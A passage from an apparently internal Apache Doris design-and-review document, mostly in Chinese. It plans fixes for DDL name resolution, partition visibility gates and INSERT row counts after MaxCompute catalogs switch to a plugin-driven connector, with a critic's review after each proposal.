独立 commit;仅触 fe-core;编译 `-pl :fe-core -am`): + 1. [fe-core] `PluginDrivenExternalCatalog.createTable`(:264-287):在 `convert(...)` 前加 `getDbNullable(createTableInfo.getDbName())` 取 db、null 校验抛 `DdlException`,把第二参由 `createTableInfo.getDbName()` 改为 `db.getRemoteName()`。editlog `org.apache.doris.persist.CreateTableInfo`(:274-278) 与 `getDbForReplay(...).resetMetaCacheNames()`(:283) 维持本地名不变。 + 2. [fe-core] `PluginDrivenExternalCatalog.dropTable`(:353-374):在 `getTableHandle` 前加 `getDbNullable(dbName)` + `db.getTableNullable(tableName)` 解析;db/table 为 null 时按 ifExists 返回否则抛(mirror base 语义,同时附带修 DDL-C7 的库存在校验,但仅为达成正确寻址的必要前置,不扩范围);`getTableHandle(session, dorisTable.getRemoteDbName(), dorisTable.getRemoteName())`。editlog `DropInfo`(:371) 与 `unregisterTable`(:372) 维持本地名。 + 3. [fe-connector-maxcompute] 无改动(连接器契约保持“接收即远端名”)。 + 4. [fe-connector-api] 无改动(无需扩 SPI)。 + 5. [thrift] / [be] 无改动。 + - import-gate:fe-core 已 import `ExternalDatabase`/`ExternalTable`(同包/已用),无新增第三方 import;如缺则补 `org.apache.doris.datasource.ExternalDatabase`/`ExternalTable`。 + +- **Risk**: + - 回归面小且收敛:仅改两个 override 的名解析;未开名映射时 `getRemoteName()==本地名`,行为与现状逐字节一致。 + - DROP override 现状**未做库/表存在性校验**直接 `getTableHandle`(DDL-C7);本 fix 补上 `getDbNullable` 预检会改变“库不存在”路径的异常类型(由连接器 `OdpsException→RuntimeException` 变为 FE `DdlException`),更贴 base/legacy,属改进;须在 UT 固化该行为防回退。 + - 对其他连接器/插件:纯增益——任何 full-adopter 走 PluginDriven DDL 都会因此正确解析远端名;无破坏(未开映射不变)。 + - keep 集:不删除、不触 legacy `datasource/maxcompute/`(Batch D 才删);不动连接器 keep 文件。 + - checkstyle/import-gate:仅 fe-core 内既有类型,风险低;按 fe-code-style 跑 Checkstyle。 + - 反例提醒(Batch D 协同):本 fix 不依赖、也不引入连接器侧 local→remote 解析;Batch D 删 legacy 时勿据“连接器内部解析 remote”这一**已被证伪的** T06c §5:187 假定行事。 + +- **Test Plan**: + - UT(fe-core,扩 `fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenExternalCatalogDdlRoutingTest.java`,复用既有 Mockito + `TestablePluginCatalog` stub): + - `testCreateTableUsesRemoteDbName`:stub `dbNullableResult.getRemoteName()` 返回与本地名不同的远端名(如 local `db1`→remote `DB1`),`createTable` 后 `Mockito.verify(metadata).createTable(eq(session), argThat(req -> req.getDbName().equals("DB1") && req.getTableName().equals(<本地表名>)))`;断言表名**未**被改写(mirror legacy CREATE 不解析远端表名)。 + - `testCreateTableMissingDbThrows`:`dbNullableResult=null` → 期望 `DdlException`,且 `verifyNoInteractions(metadata.createTable)`。 + - `testDropTableUsesRemoteDbAndTableName`:stub `db.getTableNullable(...)` 返回一个 mock `ExternalTable`,其 `getRemoteDbName()`→`DB1`、`getRemoteName()`→`TBL1`;`dropTable` 后 `verify(metadata).getTableHandle(session, "DB1", "TBL1")`;editlog `logDropTable` 的 `DropInfo` 仍用本地名。 + - `testDropTableIfExistsMissingTableIsNoop` / `testDropTableMissingTableWithoutIfExistsThrows`:覆盖表不存在的 ifExists 语义(mirror legacy)。 + - E2E(regression-test):在 `regression-test/suites/external_table_p2/maxcompute/`(现有 `test_max_compute_create_table.groovy` 同目录)新增/扩一支,catalog 创建时设 `"lower_case_meta_names"="true"`(或 `lower_case_database_names=1`),断言点: + - `CREATE TABLE` 后 ODPS 侧真名(混合大小写库)存在、可 `SELECT`; + - `DROP TABLE IF EXISTS` 命中真实远端表后 `SHOW TABLES` 不再含该表(验证未走“本地名查不到→静默不删→残表”路径); + - 对照同套件未开映射场景行为不变。sql 断言聚焦“建/删后的可见性”而非内部名,符合 Rule 9(编码 why:名映射下寻址正确性)。 + +**Open questions**: E2E 需真实 ODPS 环境且 catalog 开 lower_case_meta_names;若 CI 无真实 MaxCompute,远端名解析正确性只能由 fe-core UT(verify getTableHandle/req.getDbName 收到远端名)兜底,E2E 标记为需 live MC 环境运行。 · DROP override 补 getDbNullable 库存在校验顺带修了 DDL-C7(库不存在时异常类型对齐 base/DdlException);确认是否将 DDL-C7 合并入本 commit(寻址正确性的必要前置)还是仅最小解析、留 DDL-C7 单独修——倾向合并以免 dropTable override 被改两次。 · CREATE TABLE 须先修 DDL-P1(paddingEngineName 只认 MaxComputeExternalCatalog,翻闸后分析期即抛错根本到不了本 override);本 fix 的 CREATE 部分在 DDL-P1 修复前不可达,故 depends_on=DDL-P1。 + +#### 🔎 对抗 critic — verdict: `needs-revision` + +**需修正(corrections)**: +- The design's Risk claim 'DROP override 现状未做库/表存在性校验直接 getTableHandle' is correct, but the framing that adding getDbNullable 'changes the库不存在 exception type from connector OdpsException→RuntimeException to FE DdlException, 更贴 base/legacy, 属改进' is only partly right: for max_compute the connector's getTableHandle does NOT throw on a missing DB — it calls structureHelper.tableExist which returns false → Optional.empty() → current code already throws FE DdlException 'Failed to get table' (line 364), NOT a RuntimeException. So the 'before' behavior described (OdpsException→RuntimeException) is not what actually happens for a missing DB on the drop path today; the improvement is real (clearer 'database' vs 'table' message) but the stated before-state is inaccurate. +- The design asserts CREATE must NOT remote-resolve the table name and cites legacy as authority. Verified correct (MaxComputeMetadataOps.java:219 passes createTableInfo.getTableName() = local literal; only db uses getRemoteName at :219). No correction to the decision itself — but note legacy createTableImpl ALSO does two FE-side existence checks (tableExist on remote db at :179 and getTableNullable at :189) that the plugin createTable override does NOT replicate and the fix does NOT add. The fix only adds the db null-check, leaving the connector to do the existence/IF-NOT-EXISTS check. This is a pre-existing divergence the fix neither closes nor flags; acceptable for scope but should be stated as an explicit non-goal rather than implied parity. + +**遗漏(gaps)**: +- EXISTING TESTS WILL BREAK, not just 'extend' — the design's test plan says 扩既有 but omits a mandatory rewrite. In /mnt/disk1/yy/.../PluginDrivenExternalCatalogDdlRoutingTest.java the stub TestablePluginCatalog.getDbNullable returns dbNullableResult which DEFAULTS TO null. After the fix, dropTable calls getDbNullable FIRST, so all 4 existing drop tests (testDropTableResolvesHandleRoutesAndUnregisters:176, testDropTableIfExistsWhenMissingIsNoop:190, testDropTableMissingWithoutIfExistsThrows:200, testDropTableWrapsConnectorException:209) will now throw 'Failed to get database' before ever reaching getTableHandle — they currently stub only getTableHandle, never getDbNullable/getTableNullable. Likewise testCreateTableInvalidatesDbCache:223 stubs only getDbForReplay, not getDbNullable, so the new createTable null-check throws DdlException and the test fails. The plan must explicitly list these 5 tests as REQUIRING rewrite (stub dbNullableResult + db.getTableNullable), otherwise the suite goes red. This is a Rule-12 'fail loud' omission. +- SHARED-OVERRIDE BLAST RADIUS understated. CatalogFactory.java:51-52 SPI_READY_TYPES = {jdbc, es, trino-connector, max_compute}. createTable/dropTable in PluginDrivenExternalCatalog are inherited by ALL FOUR, not just max_compute (verified: EsConnectorMetadata/JdbcConnectorMetadata/TrinoConnectorDorisMetadata do NOT override createTable/dropTable). The design repeatedly says '任何 full-adopter' but never names jdbc/es/trino concretely nor adds a UT proving the resolution is benign for a connector whose createTable throws 'not supported'. For DROP on jdbc/es/trino the new getDbNullable+getTableNullable adds a remote getTableNullable round-trip (ExternalDatabase.getTableNullable can hit the remote system, line 270-302) that the current code path skips — behavior end-state is still a throw so no functional regression, but the added remote call on a code path that previously short-circuited is unflagged. +- DROP path adds a getTableNullable() remote round-trip that the CURRENT plugin dropTable does not make (it goes straight to getTableHandle). This matches base ExternalCatalog.dropTable:1123 and legacy, so it is correct parity — but the design's Risk section claims '回归面小' / '逐字节一致' which is false for the unmapped case too: even WITHOUT name mapping, the fix changes the control flow (extra getDbNullable+getTableNullable resolution + potential remote validation, plus changed exception type for missing-db) for every drop on every PluginDriven catalog. The '逐字节一致' claim only holds for the SDK-bound names, not for the FE-side control flow. +- No coverage for the case where FE resolves the table exists locally but getTableHandle(remoteDb,remoteTbl) returns empty (table dropped out-of-band remotely). The existing handle-absent ifExists/throw branch (line 360-365) is preserved, but the test plan adds no case asserting it still fires AFTER the new getTableNullable resolution succeeds — i.e. a table present in FE cache but absent remotely. +- Line numbers and package paths in the design are stale/wrong (it cites fe-core/.../connector/ddl and MaxComputeMetadataOps line refs that don't all line up; actual converter is org.apache.doris.connector.ddl, CREATE override is at PluginDrivenExternalCatalog.java:263-287 with the local-dbName at :268). Cosmetic, but indicates the design was not re-derived against the current tree before writing the plan. + +**额外风险**: +- getDbNullable / getTableNullable on the master can trigger lazy metaCache build / remote round-trips (ExternalDatabase.getTableNullable Step 2-3, lines 270-302) the moment a DDL fires. If the remote (ODPS) is slow/unreachable, CREATE/DROP now blocks on metadata resolution before the SDK call, whereas the current plugin createTable path reaches the converter without that resolution. Minor latency/failure-surface change on the master write path, unmentioned. +- getRemoteDbName() on ExternalTable delegates to db.getRemoteName() (ExternalTable.java:536), and the design resolves db separately via getDbNullable then table via db.getTableNullable. There is a latent assumption that dorisTable.getRemoteDbName() (== its parent db's remoteName) equals the remoteName of the db just fetched via getDbNullable. They should be the same object, but if cache invalidation races between the getDbNullable call and getTableNullable (concurrent refresh), the two could momentarily diverge. Legacy base dropTable has the identical structure so this is not a new risk, but it is unaddressed by any concurrency note. +- The E2E plan proposes lower_case_meta_names=true on a max_compute catalog and asserts post-create visibility. But ODPS project/db naming under name-mapping is environment-specific (mixed-case real DB must already exist on the ODPS side). If the test infra's ODPS project has no mixed-case database, the E2E silently can't exercise the mapping divergence and degenerates to local==remote, giving a green test that does NOT prove the fix (Rule 9 violation). The plan does not specify how the mixed-case remote object is provisioned, so the E2E may not actually fail pre-fix. +- Per Rule 9, the proposed UT 'testCreateTableUsesRemoteDbName' must use a real CreateTableInfoToConnectorRequestConverter (or assert on the dbName actually passed) — but the existing test mocks the converter statically (MockedStatic at line 227). If the new UT keeps mocking the converter, verify(metadata).createTable(argThat(req -> req.getDbName().equals('DB1'))) cannot work because the mocked converter returns a stub req unaffected by the dbName argument. The UT must capture the SECOND argument passed to convert() (the dbName) via the static-mock invocation, not the resulting request's getDbName(). The test-plan wording 'argThat(req -> req.getDbName()...)' is unimplementable against the existing mocking style and would either not compile against intent or pass vacuously. + +--- + +### 阶段 3 — 恢复分区可见 (partitions TVF / SHOW PARTITIONS) + +### FIX-PART-GATES — partitions() TVF + SHOW PARTITIONS analyze 网关 + 分区元数据 override + +**Scope**: review 发现 DDL-C1 / CACHE-C1 / CACHE-C2(severity major,regression=yes,对抗存活 3✓/0✗ ×3),含 ⚠️ Batch-D 红线。本 section 只设计、不写码。 + +#### Problem +翻闸(cutover)后 MaxCompute catalog 变成 `PluginDrivenExternalCatalog`、其表是 `PLUGIN_EXTERNAL_TABLE`。对一张真实分区的 MC 表执行两条用户命令在 FE **analyze 阶段直接抛错**,legacy 可用、翻闸即坏: +- `SELECT * FROM partitions('catalog'='mc','database'='d','table'='t')` → 抛 `AnalysisException("Catalog of type 'max_compute' is not allowed in ShowPartitionsStmt")`(若补了 catalog 网关,下一步又因表类型不在 allow-list 抛 `MetaNotFound`)。 +- `SHOW PARTITIONS FROM ` → 抛 `Table X is not a partitioned table`。 + +触发条件:翻闸后(`SPI_READY_TYPES` 含 max_compute、CatalogFactory 走 PluginDriven)对任意真实分区的 MC 表跑上述两命令。两条命令的 BE 取数支路 / dispatch / handler 都已由 T06c 接好,但因 analyze 网关挡在前面,这些 handler 是**不可达死代码**(`MetadataGenerator.dealPluginDrivenCatalog`、`ShowPartitionsCommand.handleShowPluginDrivenTablePartitions`)。 + +#### Root Cause +三个独立缺口,均为 T06c "FE 分发接线" 漏接 analyze 网关: + +1. **DDL-C1 / CACHE-C1(partitions() TVF 双重网关)** — `fe/fe-core/.../tablefunction/PartitionsTableValuedFunction.java:172-176` 的 catalog allow-list 只认 `internal / HMSExternalCatalog / MaxComputeExternalCatalog`,无 `PluginDrivenExternalCatalog`;`:184-185` 的 `getTableOrMetaException(...)` 允许类型只到 `OLAP/HMS_EXTERNAL_TABLE/MAX_COMPUTE_EXTERNAL_TABLE`,无 `PLUGIN_EXTERNAL_TABLE`。构造器 `:149` 即 eager `analyze()`,故双重挡死。已接好的 BE handler `MetadataGenerator.java:1317-1318`(dispatch)+`:1359-1377`(`dealPluginDrivenCatalog`,走 SPI + remote 名解析)永不可达。 + - 注:历史(commit 2cf7dfa81ad ③ / HANDOFF:42,61 / Batch-D 设计:72)声称 T06c 已给本文件加 PluginDriven 分支 —— **证伪**,本文件 git 全文无 `PluginDrivenExternalCatalog`,T06c 只改了 `MetadataGenerator.java`。 + +2. **CACHE-C2(SHOW PARTITIONS 的 isPartitionedTable 门)** — `fe/fe-core/.../commands/ShowPartitionsCommand.java:263-266`,对非 internal catalog 调 `table.isPartitionedTable()`,默认实现 `TableIf.java:364-366` 返 `false`。T06c 已接 allow-list(:208)、表类型(:261)、handler(:312)、dispatch(:460-461),唯独 `isPartitionedTable()` 门未过 —— `PluginDrivenExternalTable.java` 全类无此 override(已逐行读 52-260 确认),故真实分区 MC 表在 `:265` 先抛 "is not a partitioned table"。T06c 设计 §4.3:162 自己把 `isPartitionedTable` 标"验证项"却未落实。 + +3. **根因汇聚于一处缺失** — `PluginDrivenExternalTable` 缺分区元数据 override(`isPartitionedTable` / `getPartitionColumns`,以及 supportInternalPartitionPruned/getNameToPartitionItems 见 Risk 边界说明)。legacy `MaxComputeExternalTable.java:331-335`(`isPartitionedTable=getOdpsTable().isPartitioned()`)、`:88-97`(`getPartitionColumns`)是要 mirror 的可观察行为基线。 + +#### Design +通用插件层缺口(非 MC 专有,任何有分区的 full-adopter 连接器都触发),修法 **keyed on PluginDriven / connector 声明,不 hardcode maxcompute**。连接器 SPI 已足够,**无需扩展 thrift / fe-connector-api**: +- 连接器在 `getTableSchema()` 的 `ConnectorTableSchema` props 里写 `partition_columns`(`MaxComputeConnectorMetadata.java:149-153`,`ConnectorTableSchema.getProperties()`);分区名/项已有 `listPartitionNames/listPartitions/listPartitionValues`(`ConnectorTableOps.java:158/169/181`,default `emptyList()` → 非分区连接器优雅返 0 行)。 + +A. **`PluginDrivenExternalTable` 新增分区元数据 override(fe-core,核心修复)** +- `@Override public boolean isPartitionedTable()` —— 经 connector 声明判定:`makeSureInitialized()` 后读 `getTableSchema` 暴露的 `partition_columns` prop(等价:`!getPartitionColumns().isEmpty()`),非空即 partitioned。mirror legacy `isPartitionedTable()=odpsTable.isPartitioned()`。 +- `@Override public List getPartitionColumns(Optional snapshot)` —— 返回 schema 里被标为分区列的 `Column`。数据源:connector 已在 `initSchema()`(`PluginDrivenExternalTable.java:78-109`)把分区列也并入 columns;分区列名取自 `ConnectorTableSchema` 的 `partition_columns` prop。最小实现:用该 prop 的列名集合从 `getFullSchema()` 过滤出分区列(保持 ConnectorColumnConverter 已转好的 Doris `Column`,避免重复转换)。mirror legacy `getPartitionColumns()`。 +- 不在 SPI 层硬编码 MC:判定一律走 `ConnectorTableSchema` props,任何 full-adopter 复用。 +- 这一处同时打通 SHOW PARTITIONS 的 `isPartitionedTable` 门(CACHE-C2)与 TVF 的"是否分区表"语义。 + +B. **`PartitionsTableValuedFunction.analyze()` 双网关补 PluginDriven 分支(fe-core,DDL-C1/CACHE-C1)** +- catalog allow-list `:172-176`:追加 `|| catalog instanceof PluginDrivenExternalCatalog`(**新增分支,不动既有 MaxCompute 分支** —— Batch-D 红线)。 +- 表类型 `getTableOrMetaException` `:184-185`:追加 `TableType.PLUGIN_EXTERNAL_TABLE`。 +- "非分区表"守卫:在现有 `if (table instanceof MaxComputeExternalTable)`(`:200-204`,检查 `getOdpsTable().getPartitions().isEmpty()`)**旁加**一个 `else if (table instanceof PluginDrivenExternalTable && !table.isPartitionedTable())` → 抛 "Table X is not a partitioned table",mirror legacy MC 对空分区表的可观察行为。依赖 A 的 `isPartitionedTable()`。 +- 新增 import `org.apache.doris.datasource.PluginDrivenExternalCatalog`、`PluginDrivenExternalTable`。 + +C. **SHOW PARTITIONS 侧无需改 ShowPartitionsCommand.java** —— allow-list/表类型/dispatch/handler 已由 T06c 接好;`:263-266` 的 `isPartitionedTable()` 门由 A 的 override 自然放行。零改动该文件即修复 CACHE-C2。 + +D. **Batch-D 红线(显式推翻历史前提,不删码)** — Batch-D 设计 `:70-77,:102` 的 amendment 假设"T06c 已在 `PartitionsTableValuedFunction` 加 PluginDriven 分支",前提**错误**:本 fix 落地前文件根本无该分支。本 fix(B)使该假设**首次成真**。Batch-D 执行删 `:173` 的 MaxCompute 分支,**必须在 B 已 merge、确认 PluginDriven 分支存在后**进行;否则会删掉唯一放行分支、永久坐实 partitions() 对 MC 不可用。设计须在 decisions/Batch-D 文档显式标注此 ordering 依赖(更新 D-028 / Batch-D amendment 措辞由"T06c adds"改为"FIX-PART-GATES adds")。 + +#### Implementation Plan +逐文件逐方法(每条标层)。约束:每 issue 独立 commit;改 fe-core 带 `-pl :fe-core -am`;不改连接器(connector 已就绪)。建议拆 2 commit: +1. **commit ①(fe-core)**:`PluginDrivenExternalTable` override + TVF 网关。 + - `[fe-core]` `fe/fe-core/.../datasource/PluginDrivenExternalTable.java`:新增 `isPartitionedTable()`、`getPartitionColumns(Optional)` 两个 override(读 `ConnectorTableSchema` props 的 `partition_columns`,keyed on connector 声明)。 + - `[fe-core]` `fe/fe-core/.../tablefunction/PartitionsTableValuedFunction.java`:`:172-176` catalog allow-list 加 `|| instanceof PluginDrivenExternalCatalog`;`:184-185` 加 `TableType.PLUGIN_EXTERNAL_TABLE`;`:200-204` 旁加 PluginDriven 非分区守卫;补 2 import。 +2. **commit ②(docs)**:更新 `plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md:70-77,102` amendment 措辞 + decisions-log D-028,标注 Batch-D 删 `:173` 须排在本 fix 之后(Batch-D 红线)。 +- **不涉及**层:fe-connector-maxcompute(connector 已 expose partition_columns/listPartition*,零改)、fe-connector-api(SPI 充分,零改)、be、thrift。 +- 守门:`isPartitionedTable` 等 override 须 `makeSureInitialized()` 后取 schema;checkstyle 扫 test 源同样适用。 + +#### Risk +- **回归风险(低-中)**:`getPartitionColumns` 若返回值与 legacy `MaxComputeSchemaCacheValue.getPartitionColumns()` 顺序/类型不一致,DESCRIBE / SHOW PARTITIONS 列名展示会偏。须以 legacy 输出为基线核对(connector `initSchema` 已按 partition columns 追加,顺序应一致)。 +- **对其他连接器/插件影响(正向)**:override keyed on `partition_columns` prop —— 不声明分区列的连接器(JDBC/ES)`isPartitionedTable()` 仍返 false、`getPartitionColumns()` 返空,行为不变;SHOW PARTITIONS 对其继续抛 "not a partitioned table"(与 legacy 一致)。无连接器特判。 +- **keep 集 / Batch-D**:本 fix **新增** PluginDriven 分支,**不触碰** `PartitionsTableValuedFunction:173` 的 MaxComputeExternalCatalog keep 分支(翻闸后仍可能有遗留 MC 表/Batch-D 未跑)。是修复 Batch-D 红线前提的必要前置。 +- **边界 / 已知降级(fail loud,需显式登记,非本 section 修)**:本 fix 只恢复 `isPartitionedTable`/`getPartitionColumns`(满足 SHOW PARTITIONS + partitions() TVF 显示)。**未** override `supportInternalPartitionPruned()` / `getNameToPartitionItems()` → FE 侧内部分区裁剪(legacy 有,带 partition_values 二级 cache)仍缺失,即 review 独立发现 READ-P3 / CACHE-C-SELECT / CACHE-P1(分区裁剪丢失 → 整表扫)。须在 deviations-log 显式记为已知降级,勿在本 fix 误标"分区能力已全恢复"。若决策要求一并恢复裁剪,则追加 `supportInternalPartitionPruned()=true`(经 connector capability) + `getNameToPartitionItems()`(经 `listPartitions` 构 `PartitionItem`),属更大改动,单独评估。 +- **import-gate / checkstyle**:仅加标准 doris import,无新依赖。 + +#### Test Plan +- **UT(fe-core,`-pl :fe-core -am`)**: + - 新增/扩展 `fe/fe-core/src/test/.../datasource/PluginDrivenExternalTableEngineTest.java`(或同包新建):构造一张 connector 声明 `partition_columns` 的 PluginDriven 表,断言 `isPartitionedTable()==true`、`getPartitionColumns()` 非空且列名匹配;再构造无分区列的表,断言 `false`/空 → 锁住 keyed-on-connector 语义(Rule 9:测的是"为何分区表必须放行",非仅 handler 形状)。 + - **扩展 `ShowPartitionsCommandPluginDrivenTest.java`**:现有 testHandlerRoutesToSpiWithRemoteNames 用反射**直调 handler、跳过了 analyze 网关**(正是 CACHE-C2 逃逸的原因)。须新增一条**驱动 `analyze()`/validate gate** 的用例,在分区表上断言不抛 "not a partitioned table"、在非分区表上断言抛 —— 让该 UT 能在 `isPartitionedTable` 回归时失败。 + - 新增 `PartitionsTableValuedFunctionPluginDrivenTest`(或扩展 `MetadataGeneratorPluginDrivenTest.java`):断言 PluginDriven catalog + PLUGIN_EXTERNAL_TABLE 通过 `analyze()` 双网关(不抛 "not allowed" / MetaNotFound),且空分区表抛 "not a partitioned table"。 +- **E2E(regression-test/suites,p2 真实 ODPS)**:这些套件翻闸后跑在 PluginDriven catalog 上,本 fix 让它们恢复绿: + - `regression-test/suites/external_table_p2/maxcompute/test_external_catalog_maxcompute.groovy:395/428/437`(`show partitions from multi_partitions / other_db_mc_parts / mc_parts`)—— 断言分区行非空、与 `.out` 基线一致。 + - `regression-test/suites/external_table_p2/maxcompute/test_max_compute_schema.groovy:127/128`(`show partitions from default.order_detail / analytics.web_log`)。 + - `regression-test/suites/external_table_p2/maxcompute/test_max_compute_partition_prune.groovy:69-71`(`show partitions one/two/three_partition_tb`)。 + - **新增 partitions() TVF 断言点**:在上述某 MC 分区表套件加 `order_qt_partitions_tvf """ SELECT * FROM partitions('catalog'=...,'database'=...,'table'=<分区表>) """`,断言返回分区名集合(覆盖 DDL-C1/CACHE-C1,现有套件无 TVF 用例)。 + - 断言点统一:行数 > 0、分区名格式 `k=v[/k2=v2]`、排序稳定(用 `order_qt_`)。 + +**Open questions**: 分区裁剪(supportInternalPartitionPruned/getNameToPartitionItems + partition_values 二级 cache)是否要在本 fix 一并恢复,还是仅做 isPartitionedTable/getPartitionColumns 最小修、把裁剪丢失作为已知降级登记 deviations-log(对应独立发现 READ-P3/CACHE-C-SELECT/CACHE-P1)? 建议本 section 只做最小修,裁剪另起。 · getPartitionColumns 的实现是直接从 getFullSchema() 按 partition_columns prop 名集过滤(复用已转 Column),还是要求 connector 在 ConnectorTableSchema 显式标记每列 isPartition? 现状 prop 只给逗号分隔列名,过滤可行;若日后多连接器需更强契约,可议是否给 ConnectorColumn 加 isPartition 标志(SPI 扩展,本 fix 不做)。 · partitions() TVF 对空分区/非分区 PluginDriven 表的报错文案是否需与 legacy MC 完全逐字一致('Table X is not a partitioned table'),还是允许沿用通用文案? 影响是否需在 TVF 单独加守卫(B 已按 mirror legacy 设计加)。 · Batch-D 删除 PartitionsTableValuedFunction:173 MaxCompute 分支的 ordering:本 fix 必须先 merge;需确认 Batch-D 文档/decisions-log 已据此更新 amendment 措辞,否则红线仍在。 + +#### 🔎 对抗 critic — verdict: `needs-revision` + +**需修正(corrections)**: +- Design section A's data-source description is internally contradictory and partly wrong: 'connector 已在 initSchema() 把分区列也并入 columns;分区列名取自 ConnectorTableSchema 的 partition_columns prop。最小实现:用该 prop 的列名集合从 getFullSchema() 过滤'. getFullSchema() does include the partition Columns (connector appends them at :141, mirrored by legacy at :196), BUT the prop needed to identify which columns are partition columns is not available from getFullSchema() nor from the cache. The 'equivalent: !getPartitionColumns().isEmpty()' phrasing for isPartitionedTable() is circular if getPartitionColumns itself depends on the prop. Correct the design to specify the exact prop-sourcing mechanism (re-fetch vs. cache-subclass). +- The Batch-D red-line (part D) is correct AND the existing Batch-D doc is factually wrong as the design states: the amendment at P4-batchD-maxcompute-removal-design.md:70-77 asserts 'P4-T06c adds a PluginDrivenExternalCatalog branch' for PartitionsTableValuedFunction — verified FALSE (the file contains no PluginDrivenExternalCatalog reference at all). The design's instruction to reword 'T06c adds' -> 'FIX-PART-GATES adds' and to gate the :173 MC-branch deletion behind this fix is a valid and necessary correction. No error here; this part is sound. + +**遗漏(gaps)**: +- PROP-SOURCING (load-bearing, unaddressed): The design's getPartitionColumns()/isPartitionedTable() both depend on the connector's `partition_columns` prop, but that prop is NOT persisted anywhere reachable at call time. Verified: PluginDrivenExternalTable.initSchema():108 stores `new SchemaCacheValue(columns)` (base class), and base SchemaCacheValue.java only holds `List schema` (no properties field). There is NO PluginDriven SchemaCacheValue subclass (grep confirms only Iceberg/Paimon/HMS/MaxCompute subclasses exist). ConnectorColumnConverter.convertColumn():67 drops all partition-key markers (it only carries isKey, and MaxComputeConnectorMetadata:141-146 builds partition ConnectorColumns with isKey=false). Therefore the design's stated 'minimal impl: filter getFullSchema() by the prop's name set' is impossible as written — getFullSchema() returns only Columns with no way to identify partition columns, and the prop is not in the cache. The override MUST either (a) re-call metadata.getTableSchema() via the connector SPI on every isPartitionedTable()/getPartitionColumns() call (a remote ODPS metadata round-trip), or (b) introduce a PluginDrivenSchemaCacheValue subclass that persists partition_columns and have initSchema() populate it. The design picks neither and the two design bullets contradict (one says 'read getTableSchema-exposed prop' = re-fetch; the other says 'filter getFullSchema()' = impossible). This must be resolved before implementation. +- PERF/BEHAVIOR DEVIATION not flagged: if the chosen sourcing is per-call getTableSchema() re-fetch (the only option without a new cache subclass), then isPartitionedTable() — called inside ShowPartitionsCommand.validate() at :264 and potentially in planner partition paths — issues a live remote metadata fetch each time, whereas legacy MaxComputeExternalTable.getPartitionColumns():92-97 reads from the cached MaxComputeSchemaCacheValue. Design does not register this as a deviation. +- TEST INFEASIBILITY for the proposed UT not acknowledged: the new 'assert isPartitionedTable()==true' test on PluginDrivenExternalTable requires stubbing the connector's getTableSchema() to return the partition_columns prop AND ensuring the schema-cache/init path is reachable (the existing PluginDrivenExternalTableEngineTest helper never triggers initSchema(); it only exercises getEngine/getEngineTableTypeName which don't touch schema). The test plan doesn't state how the prop is fed to the table under test, which is non-trivial given the prop is not cached. +- COLUMN-NAME MAPPING mismatch for the generalized claim: initSchema():98-105 remaps column names via metadata.fromRemoteColumnName() (e.g., JDBC lowercases), but MaxComputeConnectorMetadata writes the RAW remote partition names into the `partition_columns` prop at :140 BEFORE any mapping. So 'filter getFullSchema() (mapped names) by prop names (raw names)' breaks for any connector that remaps identifiers. MC itself does NOT override fromRemoteColumnName (verified — default returns name unchanged), so MC works today, but the design's central 'keyed on connector, any full-adopter reuses' claim is unsound for remapping connectors and must be either narrowed or fixed by mapping the prop names through fromRemoteColumnName. +- partition_values() TVF gate not mentioned: PartitionValuesTableValuedFunction.java:114-115 has the identical missing-PluginDriven catalog gate and :127 lacks PLUGIN_EXTERNAL_TABLE, and Batch-D's delete list includes its MC branch (~:115). The design scopes out partition_values entirely. This is DEFENSIBLE (verified :132-134 only ever supported HMS tables — 'Currently only support hive table's partition values meta table' — so MC tables always hit that throw even in legacy, meaning no regression and no Batch-D red-line equivalent), but the design should explicitly note it distinguished this case rather than silently omitting a file in the same Batch-D delete list. + +**额外风险**: +- Ordering fragility beyond Batch-D: getPartitionColumns() correctness relies on the prop's comma-separated order matching the schema-append order. Verified this holds today (MaxComputeConnectorMetadata:137-147 builds partitionColumnNames and appends columns in the same loop; legacy MaxComputeExternalTable.initSchema:181-197 appends in odpsTable partition-column order). But if a connector ever builds the prop and the column list in different orders, getPartitionColumns() would silently misorder — there's no invariant enforcing this. Worth a guard/assert or a doc note in the SPI contract for partition_columns. +- isPartitionedTable() is a TableIf default returning false and is consumed in more places than SHOW PARTITIONS (planner, DESCRIBE, partition-prune entry checks). Flipping it to true for MC PluginDriven tables WITHOUT also overriding supportInternalPartitionPruned()/getNameToPartitionItems() (which the design explicitly defers) can produce an inconsistent state: a table that reports isPartitionedTable()==true but supportInternalPartitionPruned()==false and getNameToPartitionItems()=={} (the ExternalTable defaults at :458/:478). Verified ExternalTable.initSchemaAndPartitionPrune-style logic uses these together (PartitionValuesTableValuedFunction/ExternalTable:440-446 gate on supportInternalPartitionPruned + getPartitionColumns + getNameToPartitionItems). The design registers the pruning loss as a known degradation, but should also verify no code path assumes isPartitionedTable()==true IMPLIES non-empty getNameToPartitionItems(), which could NPE/empty-prune-to-full-scan inconsistently rather than cleanly. +- follower/replay and gsonPostProcess: PluginDrivenExternalTable.gsonPostProcess():157-165 only fixes table type; the new overrides read live connector schema, so on a follower FE (or after replay) the first isPartitionedTable() triggers connector init. If the connector/session isn't ready on a follower at validate() time this could throw where legacy (cache-backed) did not. Not analyzed by the design; worth confirming follower behavior for the re-fetch path. +- The new 'non-partitioned guard' in PartitionsTableValuedFunction (design B: `else if (table instanceof PluginDrivenExternalTable && !table.isPartitionedTable())`) will, under per-call re-fetch sourcing, perform a remote getTableSchema() during TVF analyze for every partitions() call on a PluginDriven table — including non-MC connectors that declared no partition_columns (they'll re-fetch, get empty, and throw 'not a partitioned table'). Behavior is correct but adds a remote call to the analyze hot path that legacy MC avoided (legacy used cached getOdpsTable().getPartitions()). + +--- + +### 阶段 4 — 写回正确性 (affected rows) + +### FIX-WRITE-ROWS — INSERT affected rows 恒 0 — doBeforeCommit 补 loadedRows=getUpdateCnt() + +- **Problem**: 翻闸(SPI 事务模型,当前唯一 adopter = MaxCompute)后,对 PluginDriven 外表执行 `INSERT INTO ...` 数据被正确写入,但客户端返回 / `SHOW INSERT RESULT` / `fe.audit.log` 的 returnRows 恒为 `affected rows: 0`。触发条件:catalog 走 SPI 事务模型(`writeOps.usesConnectorTransaction()==true`,即 `connectorTx != null`)的任意 INSERT。JDBC / auto-commit handle 模型(`connectorTx==null`)不受影响。属可观察输出回归(数据不丢,但行数判读错误,影响用户、审计、上层工具)。 + +- **Root Cause**: 精确定位 + - `fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java:146-150` —— `doBeforeCommit()` 只在 `insertHandle 